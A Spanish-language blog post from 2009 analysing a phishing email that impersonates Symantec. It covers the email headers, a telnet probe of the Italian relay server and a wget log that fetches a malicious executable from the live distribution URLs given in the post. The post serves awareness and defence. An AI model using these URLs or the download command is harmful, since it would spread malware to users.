Symantec usa la ciencia infusa para detectar los fallos en tu ordenador

Esta mañana ha empezado bien el día, con gracia y solera vamos… Al abrir la carpeta de de mi correo (cosa que suelo hacer de vez en cuando para ver qué ha caido, vaciarla, etc.), había un mensaje que me ha llamado la atención. Los motivos han sido dos: el remitente aparecía como “” y el asunto era “ Examen de “. Al instante, la eterna pregunta… ¿lo abro o no lo abro? mmm… los que me conocéis sabéis como acabó la cosa, soy demasiado curioso :)

Al abrirlo, me he encontrado con la siguiente imagen (por cierto, hay premio para el que encuentre más de 7 patadas al diccionario):

sym-phising

A continuación vamos a empezar a destrozar este correo, por si a alguien no le ha quedado claro que es más falso que un billete de 3€.

Empezamos por el contenido, que ya me da la risa con solo leerlo… Ese “Hemos probado los defectos en su sistema”… Esto lo conozco yo como ciencia infusa… Si ni siquiera le he pedido un escáner, ni tengo el antivirus de , ni naa de naa, ha cogido el sistema, que es muy listo, y ha dicho “este tío tiene el Worm@blda.245. ¡¡¡Que encima no existe!!! O al menos, hoy en día si no aparece en google es lo mismo… Pero vamos, que acojona el mensaje… ¿o no? 8-)

Lo segundo, es el remitente, que en la imagen no lo podéis ver. Por lo visto viene de la dirección symantec@worm.es. Vamos, clavadito a las direcciones que usaría en sus notificaciones oficiales. Y encima ese “worm.es” como que no echa para atrás…

Pero podemos ir algo más allá… Si le damos para ver las cabeceras SMTP del mensaje, que en gmail se realiza pulsando en el botón que está a la derecha de “Responder“, opción “Mostrar original” del desplegable:

gmail_opciones

Con esto podemos ver de dónde viene el mensaje, y dice cosas relevadoras.

Received: from vsmtp4.tin.it ([212.216.176.224]) by SNT0-MC1-F48.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
 Tue, 19 May 2009 13:08:37 -0700
Received: from User (189.73.235.32) by vsmtp4.tin.it (8.0.025) (authenticated as mick999@virgilio.it)
        id 49F5BF4D0152E173; Tue, 19 May 2009 22:08:34 +0200
Message-ID: <49F5BF4D0152E173@vsmtp4.tin.it> (added by postmaster@virgilio.it)
Reply-To: symantec@worm.es
From: symantec@worm.es

Como podemos ver, lo ha enviado el servidor vsmtp4.tin.it. Es decir, que este servidor es un coladero de . Además, quien lo ha enviado se ha autenticado como mick999@virgilio.it. Es decir, o bien cualquiera con una dirección en ese sevidor puede enviar correo sin poner contraseña,  bien le han sacado la contraseña, o bien es un servidor de cuentas gratuitas el spammer se ha abierto una y la está usando a saco. Me inclino por esta última, sobre todo después de visitar el sitio

Además viene el mail del postmaster, que como no podía ser de otra forma es “postmaster@virgilio.it“. Dan ganas de mandarle un correo diciendo que su servidor tiene algún problemilla…

Si intentamos conectarnos al servidor, nos saldrá lo siguiente:

telnet vsmtp4.tin.it 25
Trying 212.216.176.224...
Connected to vsmtp4.tin.it.
Escape character is '^]'.
220 vsmtp4.tin.it ESMTP Service ready
helo me
250 vsmtp4.tin.it
mail from:
250 MAIL FROM: OK
rcpt to:
550 RCPT TO: Relaying not allowed -please use SMTP AUTH

Sí que pide autenticación, por lo que seguramente se hayan creado una cuenta gratuita…

Queda otro detalle. La imagen tiene un botón start. ¿Qué pasa si lo pulsamos? Como se puede ver, se conecta a “http://www.starturl.com/hsecg” con el objetivo de descargar un fichero denominado “Update..Worm_blda.245.exe“.

wget http://www.starturl.com/hsecg
--2009-05-20 10:30:57--  <a></a>
Resolviendo www.starturl.com... 72.167.131.40
Conectando a www.starturl.com|72.167.131.40|:80... conectado.
Petición HTTP enviada, esperando respuesta... 302 Moved Temporarily
Ubicación: http://symantec.update.worm.mail15.su/Update.Symantec.Worm_blda.245.exe
[siguiente]
--2009-05-20 10:30:58--
http://symantec.update.worm.mail15.su/Update.Symantec.Worm_blda.245.exe
Resolviendo symantec.update.worm.mail15.su... 82.204.219.237
Conectando a symantec.update.worm.mail15.su|82.204.219.237|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 209920 (205K) [application/octet-stream]
Guardando: «Update.Symantec.Worm_blda.245.exe»
 
100%[======================================>] 209.920      206K/s   en 1,0s
 
2009-05-20 10:31:00 (206 KB/s) - `Update.Symantec.Worm_blda.245.exe' guardado [209920/209920]

 Se supone que un usuario inocente pensará que es una actualización de para protegerle de tan temido y lo ejecutará agradeciendo a dicha empresa su generosidad en detectar el a tiempo… Hombrecillos…

Lo que no he hecho aún, y sinceramente no creo que haga ya, es comprobar que hace el . De todos modos en un visazo rápido parece que está realizado en .NET usando Code Gear RAD Studio. Lo digo por que tiene esto:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
 <assemblyIdentity
 
                  type="win32"
 
                                 name="CodeGear RAD Studio"
   version="11.0.2627.5503"
   processorArchitecture="*"/>
 <dependency>
   <dependentAssembly>
     <assemblyIdentity
       type="win32"
       name="Microsoft.Windows.Common-Controls"
       version="6.0.0.0"
       publicKeyToken="6595b64144ccf1df"
       language="*"
       processorArchitecture="*"/>
  </dependentAssembly>
 
 </dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
...........

Es que, ya no hacen como los de antes…

Resumiendo: esto es un phising que pretende venir de Symantec para protegernos de un super que tenemos (viva la ingeniería social, por lo menos no han dicho nada de que cierran Hotmail XD ), y para ello nos tenemos que descargar un fichero, siendo este el vedadero. Está visto que hay que ir con cuidadito por esos mundos del ciber-espacio… :)

Related posts

Leido 529 veces
1 Star2 Stars3 Stars4 Stars5 Stars (1 votes, average: 4.00 out of 5)
May 20th, 2009 in Malware, Phising, Seguridad | tags: , , , , ,

Comments (6)

GurkoMay 20th, 2009 at 13:19

Muy buena la explicación de todo el proceso.

Estas hecho un crack.

miguelMay 20th, 2009 at 14:06

¡Gracias majete! Es que no lo he podido evitar al verlo… de la risa que me ha entrado casi me caigo de la silla :)
Ahora me gustaría echarle un vistazo al ficherito que te descarga, pero para eso ya no hay tiempo :(

PatriMay 20th, 2009 at 17:40

A mi tambien me ha llegado ese, y despues otro que es exactamente el mismo pero lo envian con la direccion de correo@telegrama.es y es como que te envian un telegrama de correos, y pone descargatelo y me he dado cuenta que los dos emails se los han enviado a las mismas direcciones. Gracias por avisar. yo no soy experta en nada de esto, pero la curiosidad me ha hecho llegar a esta pagina. xao.

miguelMay 20th, 2009 at 22:53

Me alegro de haber servido de ayuda :) . No conozco la otra variante que comentas, pero estos tíos van refinando sus métodos poco a poco (en unos días veremos una traducción casi perfecta XDDD ).
Por lo general, lo mejor es pasar de estas cosas y seguir con lo nuestro…
Un saludo y gracias por dejar el comentario :)

elhumeroJune 5th, 2009 at 00:22

En Linux yo también me bajo los virus. Hay que hacerlo en Windows.

miguelJune 7th, 2009 at 22:20

¿? Ya, y darle a “ejecutar” cuando te lo pregunte… ¿Para qué lo voy a bajar en Windows? Además, ¿me pagas tú la licencia para instalarlo en casa? :)

Leave a comment

Your comment

Spam Protection by WP-SpamFree